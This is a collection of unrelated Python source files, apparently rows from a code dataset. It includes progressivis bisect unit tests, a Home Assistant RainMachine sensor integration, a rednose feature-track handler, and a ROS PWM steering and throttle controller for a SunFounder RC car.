def test_power_to_watts_conversion_with_invalid_ftp(self):
power = "100"
diff = 0
invalid_ftps = [-1, 1000, "foo"]
for ftp in invalid_ftps:
with self.subTest(msg="Expected ValueError for '%s" % ftp):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
if __name__ == '__main__':
unittest.main() | 0.542379 | 0.628151 |
from progressivis.table.table import Table
from progressivis.table.constant import Constant
from progressivis import Print
from progressivis.stats import RandomTable
from progressivis.table.bisectmod import Bisect
from progressivis.core.bitmap import bitmap
from progressivis.table.hist_index import HistogramIndex
from progressivis.core import aio
from progressivis.table.stirrer import Stirrer
from . import ProgressiveTest
class TestBisect(ProgressiveTest):
def test_bisect(self):
s = self.scheduler()
random = RandomTable(2, rows=1000_000, scheduler=s)
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(random, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
#hist_index._impl.dump()
idx = random.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
def test_bisect2(self):
s = self.scheduler()
random = RandomTable(2, rows=100_000, scheduler=s)
stirrer = Stirrer(update_column='_1', delete_rows=100,
#update_rows=5,
#fixed_step_size=100,
scheduler=s)
stirrer.input[0] = random.output.result
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(stirrer, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
idx = stirrer.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
def test_bisect3(self):
s = self.scheduler()
random = RandomTable(2, rows=100_000, scheduler=s)
stirrer = Stirrer(update_column='_1', update_rows=100,
fixed_step_size=100, scheduler=s)
stirrer.input[0] = random.output.result
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(stirrer, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
idx = stirrer.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
if __name__ == '__main__':
ProgressiveTest.main() | tests/test_03_bisect.py | from progressivis.table.table import Table
from progressivis.table.constant import Constant
from progressivis import Print
from progressivis.stats import RandomTable
from progressivis.table.bisectmod import Bisect
from progressivis.core.bitmap import bitmap
from progressivis.table.hist_index import HistogramIndex
from progressivis.core import aio
from progressivis.table.stirrer import Stirrer
from . import ProgressiveTest
class TestBisect(ProgressiveTest):
def test_bisect(self):
s = self.scheduler()
random = RandomTable(2, rows=1000_000, scheduler=s)
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(random, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
#hist_index._impl.dump()
idx = random.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
def test_bisect2(self):
s = self.scheduler()
random = RandomTable(2, rows=100_000, scheduler=s)
stirrer = Stirrer(update_column='_1', delete_rows=100,
#update_rows=5,
#fixed_step_size=100,
scheduler=s)
stirrer.input[0] = random.output.result
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(stirrer, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
idx = stirrer.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
def test_bisect3(self):
s = self.scheduler()
random = RandomTable(2, rows=100_000, scheduler=s)
stirrer = Stirrer(update_column='_1', update_rows=100,
fixed_step_size=100, scheduler=s)
stirrer.input[0] = random.output.result
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(stirrer, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
idx = stirrer.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
if __name__ == '__main__':
ProgressiveTest.main() | 0.38827 | 0.490968 |
from __future__ import annotations
from dataclasses import dataclass
from functools import partial
from homeassistant.components.sensor import (
STATE_CLASS_MEASUREMENT,
STATE_CLASS_TOTAL_INCREASING,
SensorEntity,
SensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS,
VOLUME_CUBIC_METERS,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from . import RainMachineEntity
from .const import (
DATA_CONTROLLER,
DATA_COORDINATOR,
DATA_PROVISION_SETTINGS,
DATA_RESTRICTIONS_UNIVERSAL,
DOMAIN,
)
from .model import RainMachineSensorDescriptionMixin
TYPE_FLOW_SENSOR_CLICK_M3 = "flow_sensor_clicks_cubic_meter"
TYPE_FLOW_SENSOR_CONSUMED_LITERS = "flow_sensor_consumed_liters"
TYPE_FLOW_SENSOR_START_INDEX = "flow_sensor_start_index"
TYPE_FLOW_SENSOR_WATERING_CLICKS = "flow_sensor_watering_clicks"
TYPE_FREEZE_TEMP = "freeze_protect_temp"
@dataclass
class RainMachineSensorEntityDescription(
SensorEntityDescription, RainMachineSensorDescriptionMixin
):
"""Describe a RainMachine sensor."""
SENSOR_DESCRIPTIONS = (
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_CLICK_M3,
name="Flow Sensor Clicks per Cubic Meter",
icon="mdi:water-pump",
native_unit_of_measurement=f"clicks/{VOLUME_CUBIC_METERS}",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_CONSUMED_LITERS,
name="Flow Sensor Consumed Liters",
icon="mdi:water-pump",
native_unit_of_measurement="liter",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_TOTAL_INCREASING,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_START_INDEX,
name="Flow Sensor Start Index",
icon="mdi:water-pump",
native_unit_of_measurement="index",
entity_registry_enabled_default=False,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_WATERING_CLICKS,
name="Flow Sensor Clicks",
icon="mdi:water-pump",
native_unit_of_measurement="clicks",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FREEZE_TEMP,
name="Freeze Protect Temperature",
icon="mdi:thermometer",
native_unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_RESTRICTIONS_UNIVERSAL,
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up RainMachine sensors based on a config entry."""
controller = hass.data[DOMAIN][DATA_CONTROLLER][entry.entry_id]
coordinators = hass.data[DOMAIN][DATA_COORDINATOR][entry.entry_id]
@callback
def async_get_sensor(api_category: str) -> partial:
"""Generate the appropriate sensor object for an API category."""
if api_category == DATA_PROVISION_SETTINGS:
return partial(
ProvisionSettingsSensor,
entry,
coordinators[DATA_PROVISION_SETTINGS],
)
return partial(
UniversalRestrictionsSensor,
entry,
coordinators[DATA_RESTRICTIONS_UNIVERSAL],
)
async_add_entities(
[
async_get_sensor(description.api_category)(controller, description)
for description in SENSOR_DESCRIPTIONS
]
)
class ProvisionSettingsSensor(RainMachineEntity, SensorEntity):
"""Define a sensor that handles provisioning data."""
@callback
def update_from_latest_data(self) -> None:
"""Update the state."""
if self.entity_description.key == TYPE_FLOW_SENSOR_CLICK_M3:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorClicksPerCubicMeter"
)
elif self.entity_description.key == TYPE_FLOW_SENSOR_CONSUMED_LITERS:
clicks = self.coordinator.data["system"].get("flowSensorWateringClicks")
clicks_per_m3 = self.coordinator.data["system"].get(
"flowSensorClicksPerCubicMeter"
)
if clicks and clicks_per_m3:
self._attr_native_value = (clicks * 1000) / clicks_per_m3
else:
self._attr_native_value = None
elif self.entity_description.key == TYPE_FLOW_SENSOR_START_INDEX:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorStartIndex"
)
elif self.entity_description.key == TYPE_FLOW_SENSOR_WATERING_CLICKS:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorWateringClicks"
)
class UniversalRestrictionsSensor(RainMachineEntity, SensorEntity):
"""Define a sensor that handles universal restrictions data."""
@callback
def update_from_latest_data(self) -> None:
"""Update the state."""
if self.entity_description.key == TYPE_FREEZE_TEMP:
self._attr_native_value = self.coordinator.data["freezeProtectTemp"] | homeassistant/components/rainmachine/sensor.py | from __future__ import annotations
from dataclasses import dataclass
from functools import partial
from homeassistant.components.sensor import (
STATE_CLASS_MEASUREMENT,
STATE_CLASS_TOTAL_INCREASING,
SensorEntity,
SensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS,
VOLUME_CUBIC_METERS,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from . import RainMachineEntity
from .const import (
DATA_CONTROLLER,
DATA_COORDINATOR,
DATA_PROVISION_SETTINGS,
DATA_RESTRICTIONS_UNIVERSAL,
DOMAIN,
)
from .model import RainMachineSensorDescriptionMixin
TYPE_FLOW_SENSOR_CLICK_M3 = "flow_sensor_clicks_cubic_meter"
TYPE_FLOW_SENSOR_CONSUMED_LITERS = "flow_sensor_consumed_liters"
TYPE_FLOW_SENSOR_START_INDEX = "flow_sensor_start_index"
TYPE_FLOW_SENSOR_WATERING_CLICKS = "flow_sensor_watering_clicks"
TYPE_FREEZE_TEMP = "freeze_protect_temp"
@dataclass
class RainMachineSensorEntityDescription(
SensorEntityDescription, RainMachineSensorDescriptionMixin
):
"""Describe a RainMachine sensor."""
SENSOR_DESCRIPTIONS = (
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_CLICK_M3,
name="Flow Sensor Clicks per Cubic Meter",
icon="mdi:water-pump",
native_unit_of_measurement=f"clicks/{VOLUME_CUBIC_METERS}",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_CONSUMED_LITERS,
name="Flow Sensor Consumed Liters",
icon="mdi:water-pump",
native_unit_of_measurement="liter",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_TOTAL_INCREASING,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_START_INDEX,
name="Flow Sensor Start Index",
icon="mdi:water-pump",
native_unit_of_measurement="index",
entity_registry_enabled_default=False,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_WATERING_CLICKS,
name="Flow Sensor Clicks",
icon="mdi:water-pump",
native_unit_of_measurement="clicks",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FREEZE_TEMP,
name="Freeze Protect Temperature",
icon="mdi:thermometer",
native_unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_RESTRICTIONS_UNIVERSAL,
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up RainMachine sensors based on a config entry."""
controller = hass.data[DOMAIN][DATA_CONTROLLER][entry.entry_id]
coordinators = hass.data[DOMAIN][DATA_COORDINATOR][entry.entry_id]
@callback
def async_get_sensor(api_category: str) -> partial:
"""Generate the appropriate sensor object for an API category."""
if api_category == DATA_PROVISION_SETTINGS:
return partial(
ProvisionSettingsSensor,
entry,
coordinators[DATA_PROVISION_SETTINGS],
)
return partial(
UniversalRestrictionsSensor,
entry,
coordinators[DATA_RESTRICTIONS_UNIVERSAL],
)
async_add_entities(
[
async_get_sensor(description.api_category)(controller, description)
for description in SENSOR_DESCRIPTIONS
]
)
class ProvisionSettingsSensor(RainMachineEntity, SensorEntity):
"""Define a sensor that handles provisioning data."""
@callback
def update_from_latest_data(self) -> None:
"""Update the state."""
if self.entity_description.key == TYPE_FLOW_SENSOR_CLICK_M3:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorClicksPerCubicMeter"
)
elif self.entity_description.key == TYPE_FLOW_SENSOR_CONSUMED_LITERS:
clicks = self.coordinator.data["system"].get("flowSensorWateringClicks")
clicks_per_m3 = self.coordinator.data["system"].get(
"flowSensorClicksPerCubicMeter"
)
if clicks and clicks_per_m3:
self._attr_native_value = (clicks * 1000) / clicks_per_m3
else:
self._attr_native_value = None
elif self.entity_description.key == TYPE_FLOW_SENSOR_START_INDEX:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorStartIndex"
)
elif self.entity_description.key == TYPE_FLOW_SENSOR_WATERING_CLICKS:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorWateringClicks"
)
class UniversalRestrictionsSensor(RainMachineEntity, SensorEntity):
"""Define a sensor that handles universal restrictions data."""
@callback
def update_from_latest_data(self) -> None:
"""Update the state."""
if self.entity_description.key == TYPE_FREEZE_TEMP:
self._attr_native_value = self.coordinator.data["freezeProtectTemp"] | 0.749362 | 0.081923 |
import os
import sys
import numpy as np
from rednose.helpers import TEMPLATE_DIR, load_code, write_code
from rednose.helpers.sympy_helpers import quat_matrix_l, rot_matrix
def sane(track):
img_pos = track[1:, 2:4]
diffs_x = abs(img_pos[1:, 0] - img_pos[:-1, 0])
diffs_y = abs(img_pos[1:, 1] - img_pos[:-1, 1])
for i in range(1, len(diffs_x)):
if ((diffs_x[i] > 0.05 or diffs_x[i - 1] > 0.05) and
(diffs_x[i] > 2 * diffs_x[i - 1] or
diffs_x[i] < .5 * diffs_x[i - 1])) or \
((diffs_y[i] > 0.05 or diffs_y[i - 1] > 0.05) and
(diffs_y[i] > 2 * diffs_y[i - 1] or
diffs_y[i] < .5 * diffs_y[i - 1])):
return False
return True
class FeatureHandler():
name = 'feature_handler'
@staticmethod
def generate_code(generated_dir, K=5):
# Wrap c code for slow matching
c_header = "\nvoid merge_features(double *tracks, double *features, long long *empty_idxs);"
c_code = "#include <math.h>\n"
c_code += "#include <string.h>\n"
c_code += "#define K %d\n" % K
c_code += "extern \"C\" {\n"
c_code += "\n" + open(os.path.join(TEMPLATE_DIR, "feature_handler.c")).read()
c_code += "\n}\n"
filename = f"{FeatureHandler.name}_{K}"
write_code(generated_dir, filename, c_code, c_header)
def __init__(self, generated_dir, K=5):
self.MAX_TRACKS = 6000
self.K = K
# Array of tracks, each track has K 5D features preceded
# by 5 params that inidicate [f_idx, last_idx, updated, complete, valid]
# f_idx: idx of current last feature in track
# idx of of last feature in frame
# bool for whether this track has been update
# bool for whether this track is complete
# bool for whether this track is valid
self.tracks = np.zeros((self.MAX_TRACKS, K + 1, 5))
self.tracks[:] = np.nan
name = f"{FeatureHandler.name}_{K}"
ffi, lib = load_code(generated_dir, name)
def merge_features_c(tracks, features, empty_idxs):
lib.merge_features(ffi.cast("double *", tracks.ctypes.data),
ffi.cast("double *", features.ctypes.data),
ffi.cast("long long *", empty_idxs.ctypes.data))
# self.merge_features = self.merge_features_python
self.merge_features = merge_features_c
def reset(self):
self.tracks[:] = np.nan
def merge_features_python(self, tracks, features, empty_idxs):
empty_idx = 0
for f in features:
match_idx = int(f[4])
if tracks[match_idx, 0, 1] == match_idx and tracks[match_idx, 0, 2] == 0:
tracks[match_idx, 0, 0] += 1
tracks[match_idx, 0, 1] = f[1]
tracks[match_idx, 0, 2] = 1
tracks[match_idx, int(tracks[match_idx, 0, 0])] = f
if tracks[match_idx, 0, 0] == self.K:
tracks[match_idx, 0, 3] = 1
if sane(tracks[match_idx]):
tracks[match_idx, 0, 4] = 1
else:
if empty_idx == len(empty_idxs):
print('need more empty space')
continue
tracks[empty_idxs[empty_idx], 0, 0] = 1
tracks[empty_idxs[empty_idx], 0, 1] = f[1]
tracks[empty_idxs[empty_idx], 0, 2] = 1
tracks[empty_idxs[empty_idx], 1] = f
empty_idx += 1
def update_tracks(self, features):
last_idxs = np.copy(self.tracks[:, 0, 1])
real = np.isfinite(last_idxs)
self.tracks[last_idxs[real].astype(int)] = self.tracks[real]
mask = np.ones(self.MAX_TRACKS, np.bool)
mask[last_idxs[real].astype(int)] = 0
empty_idxs = np.arange(self.MAX_TRACKS)[mask]
self.tracks[empty_idxs] = np.nan
self.tracks[:, 0, 2] = 0
self.merge_features(self.tracks, features, empty_idxs)
def handle_features(self, features):
self.update_tracks(features)
valid_idxs = self.tracks[:, 0, 4] == 1
complete_idxs = self.tracks[:, 0, 3] == 1
stale_idxs = self.tracks[:, 0, 2] == 0
valid_tracks = self.tracks[valid_idxs]
self.tracks[complete_idxs] = np.nan
self.tracks[stale_idxs] = np.nan
return valid_tracks[:, 1:, :4].reshape((len(valid_tracks), self.K * 4))
def generate_orient_error_jac(K):
import sympy as sp
from rednose.helpers.sympy_helpers import quat_rotate
x_sym = sp.MatrixSymbol('abr', 3, 1)
dtheta = sp.MatrixSymbol('dtheta', 3, 1)
delta_quat = sp.Matrix(np.ones(4))
delta_quat[1:, :] = sp.Matrix(0.5 * dtheta[0:3, :])
poses_sym = sp.MatrixSymbol('poses', 7 * K, 1)
img_pos_sym = sp.MatrixSymbol('img_positions', 2 * K, 1)
alpha, beta, rho = x_sym
to_c = sp.Matrix(rot_matrix(-np.pi / 2, -np.pi / 2, 0))
pos_0 = sp.Matrix(np.array(poses_sym[K * 7 - 7:K * 7 - 4])[:, 0])
q = quat_matrix_l(poses_sym[K * 7 - 4:K * 7]) * delta_quat
quat_rot = quat_rotate(*q)
rot_g_to_0 = to_c * quat_rot.T
rows = []
for i in range(K):
pos_i = sp.Matrix(np.array(poses_sym[i * 7:i * 7 + 3])[:, 0])
q = quat_matrix_l(poses_sym[7 * i + 3:7 * i + 7]) * delta_quat
quat_rot = quat_rotate(*q)
rot_g_to_i = to_c * quat_rot.T
rot_0_to_i = rot_g_to_i * (rot_g_to_0.T)
trans_0_to_i = rot_g_to_i * (pos_0 - pos_i)
funct_vec = rot_0_to_i * sp.Matrix([alpha, beta, 1]) + rho * trans_0_to_i
h1, h2, h3 = funct_vec
rows.append(h1 / h3 - img_pos_sym[i * 2 + 0])
rows.append(h2 / h3 - img_pos_sym[i * 2 + 1])
img_pos_residual_sym = sp.Matrix(rows)
# sympy into c
sympy_functions = []
sympy_functions.append(('orient_error_jac', img_pos_residual_sym.jacobian(dtheta), [x_sym, poses_sym, img_pos_sym, dtheta]))
return sympy_functions
if __name__ == "__main__":
K = int(sys.argv[1].split("_")[-1])
generated_dir = sys.argv[2]
FeatureHandler.generate_code(generated_dir, K=K) | rednose/helpers/feature_handler.py |
import os
import sys
import numpy as np
from rednose.helpers import TEMPLATE_DIR, load_code, write_code
from rednose.helpers.sympy_helpers import quat_matrix_l, rot_matrix
def sane(track):
img_pos = track[1:, 2:4]
diffs_x = abs(img_pos[1:, 0] - img_pos[:-1, 0])
diffs_y = abs(img_pos[1:, 1] - img_pos[:-1, 1])
for i in range(1, len(diffs_x)):
if ((diffs_x[i] > 0.05 or diffs_x[i - 1] > 0.05) and
(diffs_x[i] > 2 * diffs_x[i - 1] or
diffs_x[i] < .5 * diffs_x[i - 1])) or \
((diffs_y[i] > 0.05 or diffs_y[i - 1] > 0.05) and
(diffs_y[i] > 2 * diffs_y[i - 1] or
diffs_y[i] < .5 * diffs_y[i - 1])):
return False
return True
class FeatureHandler():
name = 'feature_handler'
@staticmethod
def generate_code(generated_dir, K=5):
# Wrap c code for slow matching
c_header = "\nvoid merge_features(double *tracks, double *features, long long *empty_idxs);"
c_code = "#include <math.h>\n"
c_code += "#include <string.h>\n"
c_code += "#define K %d\n" % K
c_code += "extern \"C\" {\n"
c_code += "\n" + open(os.path.join(TEMPLATE_DIR, "feature_handler.c")).read()
c_code += "\n}\n"
filename = f"{FeatureHandler.name}_{K}"
write_code(generated_dir, filename, c_code, c_header)
def __init__(self, generated_dir, K=5):
self.MAX_TRACKS = 6000
self.K = K
# Array of tracks, each track has K 5D features preceded
# by 5 params that inidicate [f_idx, last_idx, updated, complete, valid]
# f_idx: idx of current last feature in track
# idx of of last feature in frame
# bool for whether this track has been update
# bool for whether this track is complete
# bool for whether this track is valid
self.tracks = np.zeros((self.MAX_TRACKS, K + 1, 5))
self.tracks[:] = np.nan
name = f"{FeatureHandler.name}_{K}"
ffi, lib = load_code(generated_dir, name)
def merge_features_c(tracks, features, empty_idxs):
lib.merge_features(ffi.cast("double *", tracks.ctypes.data),
ffi.cast("double *", features.ctypes.data),
ffi.cast("long long *", empty_idxs.ctypes.data))
# self.merge_features = self.merge_features_python
self.merge_features = merge_features_c
def reset(self):
self.tracks[:] = np.nan
def merge_features_python(self, tracks, features, empty_idxs):
empty_idx = 0
for f in features:
match_idx = int(f[4])
if tracks[match_idx, 0, 1] == match_idx and tracks[match_idx, 0, 2] == 0:
tracks[match_idx, 0, 0] += 1
tracks[match_idx, 0, 1] = f[1]
tracks[match_idx, 0, 2] = 1
tracks[match_idx, int(tracks[match_idx, 0, 0])] = f
if tracks[match_idx, 0, 0] == self.K:
tracks[match_idx, 0, 3] = 1
if sane(tracks[match_idx]):
tracks[match_idx, 0, 4] = 1
else:
if empty_idx == len(empty_idxs):
print('need more empty space')
continue
tracks[empty_idxs[empty_idx], 0, 0] = 1
tracks[empty_idxs[empty_idx], 0, 1] = f[1]
tracks[empty_idxs[empty_idx], 0, 2] = 1
tracks[empty_idxs[empty_idx], 1] = f
empty_idx += 1
def update_tracks(self, features):
last_idxs = np.copy(self.tracks[:, 0, 1])
real = np.isfinite(last_idxs)
self.tracks[last_idxs[real].astype(int)] = self.tracks[real]
mask = np.ones(self.MAX_TRACKS, np.bool)
mask[last_idxs[real].astype(int)] = 0
empty_idxs = np.arange(self.MAX_TRACKS)[mask]
self.tracks[empty_idxs] = np.nan
self.tracks[:, 0, 2] = 0
self.merge_features(self.tracks, features, empty_idxs)
def handle_features(self, features):
self.update_tracks(features)
valid_idxs = self.tracks[:, 0, 4] == 1
complete_idxs = self.tracks[:, 0, 3] == 1
stale_idxs = self.tracks[:, 0, 2] == 0
valid_tracks = self.tracks[valid_idxs]
self.tracks[complete_idxs] = np.nan
self.tracks[stale_idxs] = np.nan
return valid_tracks[:, 1:, :4].reshape((len(valid_tracks), self.K * 4))
def generate_orient_error_jac(K):
import sympy as sp
from rednose.helpers.sympy_helpers import quat_rotate
x_sym = sp.MatrixSymbol('abr', 3, 1)
dtheta = sp.MatrixSymbol('dtheta', 3, 1)
delta_quat = sp.Matrix(np.ones(4))
delta_quat[1:, :] = sp.Matrix(0.5 * dtheta[0:3, :])
poses_sym = sp.MatrixSymbol('poses', 7 * K, 1)
img_pos_sym = sp.MatrixSymbol('img_positions', 2 * K, 1)
alpha, beta, rho = x_sym
to_c = sp.Matrix(rot_matrix(-np.pi / 2, -np.pi / 2, 0))
pos_0 = sp.Matrix(np.array(poses_sym[K * 7 - 7:K * 7 - 4])[:, 0])
q = quat_matrix_l(poses_sym[K * 7 - 4:K * 7]) * delta_quat
quat_rot = quat_rotate(*q)
rot_g_to_0 = to_c * quat_rot.T
rows = []
for i in range(K):
pos_i = sp.Matrix(np.array(poses_sym[i * 7:i * 7 + 3])[:, 0])
q = quat_matrix_l(poses_sym[7 * i + 3:7 * i + 7]) * delta_quat
quat_rot = quat_rotate(*q)
rot_g_to_i = to_c * quat_rot.T
rot_0_to_i = rot_g_to_i * (rot_g_to_0.T)
trans_0_to_i = rot_g_to_i * (pos_0 - pos_i)
funct_vec = rot_0_to_i * sp.Matrix([alpha, beta, 1]) + rho * trans_0_to_i
h1, h2, h3 = funct_vec
rows.append(h1 / h3 - img_pos_sym[i * 2 + 0])
rows.append(h2 / h3 - img_pos_sym[i * 2 + 1])
img_pos_residual_sym = sp.Matrix(rows)
# sympy into c
sympy_functions = []
sympy_functions.append(('orient_error_jac', img_pos_residual_sym.jacobian(dtheta), [x_sym, poses_sym, img_pos_sym, dtheta]))
return sympy_functions
if __name__ == "__main__":
K = int(sys.argv[1].split("_")[-1])
generated_dir = sys.argv[2]
FeatureHandler.generate_code(generated_dir, K=K) | 0.315103 | 0.372791 |
from __future__ import division
import time
import Adafruit_PCA9685
import RPi.GPIO as GPIO
from Adafruit_GPIO import I2C
import rospy
from geometry_msgs.msg import Twist
# sudo apt install RPi.GPIO
# pip install adafruit-pca9685
# pip install adafruit-gpio
class SunFounder:
# STEERING
# used for the DRIVE_TRAIN_TYPE=SUNFOUNDER_PWM
STEERING_CHANNEL = 0 # channel on the 9685 pwm board 0-15
STEERING_LEFT_PWM = 260 # pwm value for full left steering
STEERING_RIGHT_PWM = 500 # pwm value for full right steering
# THROTTLE
# used for the DRIVE_TRAIN_TYPE=SUNFOUNDER_PWM
THROTTLE_CHANNEL = 4 # channel on the 9685 pwm board 0-15
THROTTLE_MAX_PWM = 1200 # pwm value for max movement (throttle ->= 1, -1)
THROTTLE_MIN_PWM = 500 # pwm value for min movement (throttle -> 0)
# THROTTLE_ZERO_PWM = 0 #pwm value for no movement (throttle = 0)
def map_range(x, X_min, X_max, Y_min, Y_max):
'''
Linear mapping between two ranges of values
'''
X_range = X_max - X_min
Y_range = Y_max - Y_min
XY_ratio = X_range/Y_range
y = ((x-X_min) / XY_ratio + Y_min)
return int(y)
class PCA9685:
'''
PWM motor controller using PCA9685 boards.
This is used for most RC Cars
'''
def __init__(self, channel, address=0x40, frequency=60, busnum=None, init_delay=0.1):
self.default_freq = 60
self.pwm_scale = frequency / self.default_freq
# Initialise the PCA9685 using the default address (0x40).
if busnum is not None:
# replace the get_bus function with our own
def get_bus():
return busnum
I2C.get_default_bus = get_bus
self.pwm = Adafruit_PCA9685.PCA9685(address=address)
self.pwm.set_pwm_freq(frequency)
self.channel = channel
# time.sleep(init_delay) # "Tamiya TBLE-02" makes a little leap otherwise
def set_pulse(self, pulse):
try:
self.pwm.set_pwm(self.channel, 0, int(pulse * self.pwm_scale))
except:
self.pwm.set_pwm(self.channel, 0, int(pulse * self.pwm_scale))
def run(self, pulse):
self.set_pulse(pulse)
class PWMSteering:
"""
Wrapper over a PWM motor controller to convert angles to PWM pulses.
"""
LEFT_ANGLE = -1
RIGHT_ANGLE = 1
def __init__(self,
controller=None,
left_pulse=290,
right_pulse=490):
self.controller = controller
self.left_pulse = left_pulse
self.right_pulse = right_pulse
self.pulse = map_range(0, PWMSteering.LEFT_ANGLE, PWMSteering.RIGHT_ANGLE,
self.left_pulse, self.right_pulse)
self.running = True
rospy.loginfo('PWM Steering created')
def update(self):
while self.running:
self.controller.set_pulse(self.pulse)
def run(self, angle):
self.pulse = map_range(angle,
self.LEFT_ANGLE, self.RIGHT_ANGLE,
self.left_pulse, self.right_pulse)
self.controller.set_pulse(self.pulse)
def shutdown(self):
# set steering straight
self.run(0)
self.running = False
rospy.loginfo('PWM Steering shutdown')
class PWMThrottle:
"""
SunFounder DC Motor Controller.
Used for each motor on a differential drive car.
SunFounder Smart Video Car Kit V2.0/SunFounder PiCar V.
"""
Motor_A = 17 # GPIO pin for motor a
Motor_B = 27 # GPIO pin for motor b
PWM_A = 4 # pwm channel for motor a
PWM_B = 5 # pwm channel for motor b
FORWARD = False
BACKWARD = True
def __init__(self,
max_pulse=1200,
min_pulse=500):
self.max_pulse = 1200 if max_pulse == 0 else max_pulse
self.min_pulse = 500 if min_pulse == 0 else min_pulse
GPIO.setmode(GPIO.BCM)
